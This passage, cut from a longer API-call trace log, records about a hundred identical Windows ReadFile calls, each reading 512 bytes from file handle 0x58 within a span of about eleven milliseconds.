hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.893] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.893] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.893] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.893] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.893] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.893] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.893] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.893] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.893] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.893] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.893] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.895] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.895] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.895] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.895] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.895] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.895] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.895] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.895] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.895] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.895] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.895] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.897] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.897] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.897] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.897] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.897] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.897] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.897] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.897] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.897] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.897] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.898] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.899] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.899] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.899] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.899] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.902] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.902] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.902] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.902] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.902] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.902] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.902] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.902] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, 